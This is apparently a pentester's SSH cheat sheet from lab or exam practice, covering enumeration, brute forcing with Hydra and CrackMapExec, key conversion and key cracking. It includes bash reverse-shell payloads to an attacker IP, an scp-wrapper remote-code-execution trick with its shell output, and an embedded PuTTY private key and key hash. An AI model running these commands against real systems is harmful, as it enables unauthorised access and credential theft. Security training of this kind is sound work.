SSH (22)
SSH is a cryptographic network remote administration protocol. It's built on top of TCP.
It's widely used for secure remote administration, file transfers and tunnelling.
SSH can be used for:
- Encrypted communication
- Authentication methods
- Port forwarding/tunnelling
- Secure file transfer
If we find a way to authenticate to it, we can execute commands as that user.
Built on top of TCP
METHODOLOGY
- Has this SSH server any public exploits?
- CVE-2008-0166 (September 2006 and May 13th, 2008 may be affected). Predictable PRNG Brute Force SSH
- OpenSSH 2.3 < 7.7 - Username Enumeration - https://www.exploit-db.com/exploits/45233
- Many times the SSH server reveals the Operating System version of the machine. We can look for the OS that support the specific SSH server version. For example, OpenSSH 8.2.p1 Ubuntu 4 Ubuntu0.1, corresponds to Ubuntu focal (20.04), according with launchpad https://launchpad.net/ubuntu/+source/openssh/1:8.2p1-4ubuntu0.1
- If we have a potential user, we may brute force it. Note that bruteforcing SSH users is veeeeeeery slow!
MORE RESOURCES
- https://liodeus.github.io/2020/09/18/OSCP-personal-cheatsheet.html#ssh---22
- https://book.hacktricks.xyz/pentesting/pentesting-ssh
- https://github.com/mchern1kov/pentest-everything/tree/master/enum_and_exploit/tcp-22-ssh
- https://pentestmonkey.net/cheat-sheet/ssh-cheat-sheet
Enumeration
Connect
ssh <user>@<ip> -p <port>
nmap
nmap -p 22 --script ssh-user-enum --script-args userdb=users.txt target-ip
RSA keys. Also consider ecdsa, ed25519, dsa, sshcom key types.
chmod 600 <id_rsa_file>
ssh <user>@<ip> -p <port> -i <id_rsa_file>
Obtained public key
cat id_rsa.pub
View key types on target (i.e. id_ecdsa)
/etc/ssh/*pub
ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBK6SiUV5zqxqNJ9a/p9l+VpxxqiXnYri40OjXMExS/tP0EbTAEpojn4uXKOgR3oEaMmQVmI9QLPTehCFLNJ3iJo= root@example01
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8J1/BFjH/Oet/zx+bKUUop1IuGd93QKio7Dt7Xl/J91c2EvGkYDKL5xGbfQRxsT9IePkVINONXQHmzARaNS5lE+SoAfFAnCPnRJ+KrnJdPxYf4OQEiAxHwRJHvbYaxEEuye7GKP6V0MdSvDtqKsFk0YRFVdPKuforL/8SYtSfqYUywUJ/ceiZL/2ffGGBJ/trQJ2bBL4QcOg05ZxrEoiTJ09+Sw3fKrnhNa5/NzYSib+0llLtlGbagBh3F9n10yqqLlpgTjDp5PKenncFiKl1llJlQGcGhLXxeoTI59brTjssp8J+z6A48h699CexyGe02GZfKLLLE+wKn/4luY0Ve8tnGllEdNFfGFVm7WyTmAO2vtXMmUbPaavDWE9cJ/WFXovDKtNCJxpyYVPy2f7aHYR37arLL6aEemZdqzDwl67Pu5y793FLd41qWHG6a4XD05RHAD0ivsJDkypI8gMtr3TOmxYVbPmq9ecPFmSXxVEK8oO3qu2pxa/e4izXBFc= USERZ@example #new user found
Brute Force
This will try usernames against the first password in the list
hydra -V -f -L SecLists/Usernames/xato-net-10-million-usernames.txt -P /usr/share/wordlists/rockyou.txt ssh://192.168.138.143 -u -vV
hydra -l userc -P /usr/share/wfuzz/wordlist/others/common_pass.txt 10.1.1.27 -t 4 ssh
hydra -L users.txt -p WallAskCharacter305 192.168.153.139 -t 4 ssh -s 42022
Use a colon-separated username:password combination pair on each line to do exact, one-to-one mapping between the username and password. This is worth running after checking everything else as the bruteforcing method is different.
hydra -C SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt 192.168.207.183 ssh
Crackmapexec can be used but should only be a backup as it's generally a bit slower.
cme ssh <ip> -u <user> -p <passwords_file>
cme ssh <ip> -u <users_files> -p <passwords_file>
PuTTY Tools
Generate an SSH key with
cat keeper.txt
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
puttygen keeper.txt -O private-openssh -o id_rsa
chmod 600 id_rsa
ssh root@10.10.11.227 -i id_rsa
Execute a revshell payload
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1 -oHostKeyAlgorithms=+ssh-rsa USERB@10.11.1.141 -t 'bash -i >& /dev/tcp/192.168.119.140/443 0>&1'
nc -nvlp 443
No matching key exchange method found
ssh -oKexAlgorithms=+diffie-hellman-group1-sha1\
-oHostKeyAlgorithms=+ssh-rsa\
-oCiphers=+aes256-cbc\
admin@10.11.1.252 -p 22000
Private key cracking
ssh2john id_ecdsa > id_ecdsa.hash
id_ecdsa:$sshng$6$16$0ef9e445850d777e7da427caa9b729cc$359$6f70656e7373682d6b65792d7631000000000a6165733235362d6374720000000662637279707400000018000000100ef9e445850d777e7da427caa9b729cc0000001000000001000000680000001365636473612d736861322d6e69737470323536000000086e697374703235360000004104afad8408da4537cd62d9d3854a02bf636ce8542d1ad6892c1a4b8726fbe2148ea75a67d299b4ae635384c7c0ac19e016397b449602393a98e4c9a2774b0d2700000000b0d0768117bce9ff42a2ba77f5eb577d3453c86366dd09ac99b319c5ba531da7547145c42e36818f9233a7c972bf863f6567abd31b02f266216c7977d18bc0ddf7762c1b456610e9b7056bef0affb6e8cf1ec8f4208810f874fa6198d599d2f409eaa9db6415829913c2a69da7992693de875b45a49c1144f9567929c66a8841f4fea7c00e0801fe44b9dd925594f03a58b41e1c3891bf7fd25ded7b708376e2d6b9112acca9f321db03ec2c7dcdb22d63$16$183
john --wordlist=/usr/share/wordlists/rockyou.txt id_ecdsa.hash
Errors
This means you are most likely using the private key for the wrong user, try doing a cat /etc/passwd in order to find other users to try it on. This error came from me trying a private key on the wrong user and private key which has no password asking for a password
ssh2john id_rsa > id_rsa.hash
id_rsa has no password!
If you're failing to download files, i.e. Permission denied, please try again.
scp -r -i id_rsa USERZ@192.168.214.149:/path/to/file/you/want .
RCE with scp
kali@kali:~/home/userA$ cat scp_wrapper.sh
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
'scp'*)
$SSH_ORIGINAL_COMMAND
;;
*)
echo "ACCESS DENIED."
scp
;;
esac
#!/bin/bash
case $SSH_ORIGINAL_COMMAND in
'scp'*)
$SSH_ORIGINAL_COMMAND
;;
*)
echo "ACCESS DENIED."
bash -i >& /dev/tcp/192.168.18.11/443 0>&1
;;
esac
scp -i .ssh/id_rsa scp_wrapper.sh userA@192.168.120.29:/home/userA/
kali@kali:~$ sudo nc -nlvp 443
kali@kali:~/home/userA$ ssh -i .ssh/id_rsa userA@192.168.120.29
PTY allocation request failed on channel 0
ACCESS DENIED.
connect to [192.168.118.11] from (UNKNOWN) [192.168.120.29] 48666
bash: cannot set terminal process group (932): Inappropriate ioctl for device
bash: no job control in this shell
userA@sorcerer:~$ id
id
uid=1003(userA) gid=1003(userA) groups=1003(userA)
userA@sorcerer:~$
Generate keys
ssh-keygen -t rsa -b 4096
Find keys
cat ~/.ssh/id_rsa.pub
Connect without saving the key fingerprint
This is made to ensure the fingerprint hasn't changed, if it's changed the machine may have been compromised. To understand the authenticity o the machine its connected to by analyzing the public key.
ssh -o "UserKnownHostsFile /dev/null" sshuser@10.0.0.1